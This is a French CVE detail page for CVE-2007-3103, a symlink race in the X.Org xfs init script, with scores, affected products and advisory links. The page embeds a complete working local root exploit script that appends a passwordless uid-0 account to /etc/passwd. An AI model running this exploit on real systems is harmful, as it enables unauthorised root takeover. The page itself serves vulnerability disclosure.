CVE-2007-3103 : Détail

CVE-2007-3103

A01-Broken Access Control
0.04%V3
Local
2007-07-15
20h00 +00:00
2018-10-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The init.d script for the X.Org X11 xfs font server on various Linux distributions might allow local users to change the permissions of arbitrary files via a symlink attack on the /tmp/.font-unix temporary file.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-59 Improper Link Resolution Before File Access ('Link Following')
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.2 AV:L/AC:H/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 5167

Date de publication : 2008-02-20 23h00 +00:00
Auteur : vl4dZ
EDB Vérifié : Yes

#!/bin/sh # Xorg-x11-xfs Race Condition Vuln local root exploit (CVE-2007-3103) # # Another lame xploit by vl4dZ :)) works on redhat el5 and before # # $ id # uid=1001(kecos) gid=1001(user) groups=1001(user) # $ sh xfs-RaceCondition-root-exploit.sh # [*] Generate large data file in /tmp/.font-unix # [*] Wait for xfs service to be (re)started by root... # [*] Hop, symlink created... # [*] Launching root shell # -sh-3.1# id # uid=0(root) gid=0(root) groups=0(root) # Vulnerable version is xorg-x11-xfs <= 1.0.2-3.1 and vulnerable code is # located in the start() function of the /etc/init.d/xfs script: # ... # rm -rf $FONT_UNIX_DIR # mkdir $FONT_UNIX_DIR # chown root:root $FONT_UNIX_DIR # chmod 1777 $FONT_UNIX_DIR # ... # I'm listening right now to nice free music: # http://www.jamendo.com/fr/album/5919 FontDir="/tmp/.font-unix" Zero=/dev/zero Size=900000 if [ ! -d $FontDir ]; then printf "Is xfs running ?\n" exit 1 fi cd /tmp cat > sym.c << EOF #include <unistd.h> int main(){ for(;;){if(symlink("/etc/passwd","/tmp/.font-unix")==0) {return 0;}}} EOF cc sym.c -o sym>/dev/null 2>&1 if [ $? != 0 ]; then printf "Error: Cant compile code" exit 1 fi printf "[*] Generate large data file in $FontDir\n" dd if=${Zero} of=${FontDir}/BigFile bs=1024 count=${Size}>/dev/null 2>&1 if [ $? != 0 ]; then printf "Error: cant create large file" exit 1 fi printf "[*] Wait for xfs service to be (re)started by root...\n" ./sym if [ $? != 0 ]; then printf "Error: code failed...\n" exit 1 fi if [ -L /tmp/.font-unix ]; then printf "[*] Hop, symlink created...\n" printf "[*] Launching root shell\n" sleep 2 rm -f /tmp/.font-unix echo "r00t::0:0::/:/bin/sh" >> /etc/passwd fi su - r00t # milw0rm.com [2008-02-21]

Products Mentioned

Configuraton 0

Fedoraproject>>Fedora_core >> Version 6.0

    Redhat>>Enterprise_linux >> Version 4.0

      Redhat>>Enterprise_linux >> Version 4.0

        Redhat>>Enterprise_linux >> Version 4.0

          Redhat>>Enterprise_linux_desktop >> Version 4.0

          Redhat>>Linux >> Version *

          Références

          http://secunia.com/advisories/35674
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.securityfocus.com/bid/24888
          Tags : vdb-entry, x_refsource_BID
          http://www.redhat.com/support/errata/RHSA-2007-0520.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://secunia.com/advisories/26081
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.debian.org/security/2007/dsa-1342
          Tags : vendor-advisory, x_refsource_DEBIAN
          http://secunia.com/advisories/27240
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/26056
          Tags : third-party-advisory, x_refsource_SECUNIA
          https://www.exploit-db.com/exploits/5167
          Tags : exploit, x_refsource_EXPLOIT-DB
          http://www.securitytracker.com/id?1018375
          Tags : vdb-entry, x_refsource_SECTRACK
          http://security.gentoo.org/glsa/glsa-200710-11.xml
          Tags : vendor-advisory, x_refsource_GENTOO
          http://bugzilla.redhat.com/242903
          Tags : x_refsource_CONFIRM
          http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=557
          Tags : third-party-advisory, x_refsource_IDEFENSE
          http://secunia.com/advisories/26282
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.redhat.com/support/errata/RHSA-2007-0519.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://osvdb.org/40945
          Tags : vdb-entry, x_refsource_OSVDB